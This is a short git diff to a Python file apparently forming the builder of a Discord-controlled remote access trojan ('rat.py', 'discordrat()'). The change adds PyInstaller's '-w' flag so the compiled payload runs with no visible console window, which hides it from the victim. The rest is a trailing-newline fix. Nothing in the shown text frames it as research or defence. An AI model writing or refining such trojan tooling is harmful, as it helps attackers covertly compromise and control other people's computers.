diff --git a/Additional_File/2_Rat/rat.py b/Additional_File/2_Rat/rat.py index 8331c04..5ead158 100644 --- a/Additional_File/2_Rat/rat.py +++ b/Additional_File/2_Rat/rat.py @@ -1226,7 +1226,7 @@ def shell(): os.system('cls' if os.name == 'nt' else 'clear') print(f'{y}[{b}#{y}]{w} File creation...') time.sleep(1) - os.system(f"pyinstaller -y -F temp/{fileName}.py") + os.system(f"pyinstaller -y -F -w temp/{fileName}.py") os.system('cls' if os.name == 'nt' else 'clear') print(f'{y}[{b}#{y}]{w} Cleaning up old files...') time.sleep(1) @@ -1247,4 +1247,4 @@ def shell(): input(f"{y}[{b}#{y}]{w} Press ENTER to exit") main() -discordrat() \ No newline at end of file +discordrat()